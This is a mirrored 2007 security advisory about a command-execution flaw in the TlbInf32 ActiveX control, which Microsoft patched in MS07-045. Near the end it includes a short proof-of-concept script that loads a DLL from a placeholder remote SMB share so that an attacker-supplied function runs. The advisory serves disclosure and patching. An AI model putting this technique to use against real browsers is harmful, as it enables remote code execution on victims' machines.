Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17831
HistoryAug 17, 2007 - 12:00 a.m.

TlbInf32 ActiveX Command Execution

2007-08-1700:00:00
vulners.com
25
JSON

========================================================================
= TlbInf32 ActiveX Command Execution

= MS Bulletin posted:
= http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx

= Affected Software:
= Internet Explorer
= tlbInf32.dll
= vstlbinf.dll

= Public disclosure on Wednesday August 15, 2007

The TypeLib Information object library , implemented in TlbInf32.dll,
is a set of COM objects designed to make type library browsing
functionality easily accessible to both Visual Basic and C++
programmers.

Although it is not marked as safe for scripting in the registry, it does
implement IObjectSafety.

Report for Clsid: {8B217746-717D-11CE-AB5B-D41203C10000}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data

The TypeLibInfoFromFile() function is used to open a file and retrieve
the
typelib information from it.

TypeLibInfoFromFile(ByVal FileName As String) As TypeLibInfo

This function will accept a webdav/smb share to a DLL file, allowing the
retrieval of information from a DLL hosted on a remote server.

========================================================================
TlbInf32.chm
Type libraries can contain help information for the library itself
(TypeLibInfo object), each TypeInfo (TypeInfo object), and each member
(MemberInfo object). This information is available in several
different
forms.

HelpString is the documentation string which appears as a short
description of the string in object browsers. If the optional LCID
(Language/Country identifier) is specified, then the returned string
is
localized if possible.

Documentation strings can be stored either in the type library
directly
or retrieved via a call to the DLLGetDocumentation entry point in the
Dll
specified by the HelpStringDll property.

The HelpStringContext is passed to the HelpStringDll to get the
correct
documentation string for the object. The HelpStringDll and
HelpStringContext properties values are used automatically by the
HelpString property.

If the DLL file specified in the call to TypeLibInfoFromFile() has been
modified to direct the HelpStringDll property to a DLL which exports
a malicious DLLGetDocumentation function, then this function will be
executed when a request for the HelpString property is made.

<object width=1000 height=20 classid="CLSID:<CLASSID>"
name=test></object>
x= test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
' Call the remote DLLGetDocumentation function
alert(x.Interfaces.Item(a).Members.Item(b).HelpString)

== Solutions ==

Install the vendor supplied patch.
http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx

== Credit ==

Discovered and advised to Microsoft November 23 2006 by Brett Moore of
Security-Assessment.com

As this is my last advisory release before I leave sa.com and head off
into the future, I gotta say thanx to the team there, its been a blast
guys.

All you kiwis overseas have you thought about a trip home.
www.kiwicon.org

±SoSD-+

JSON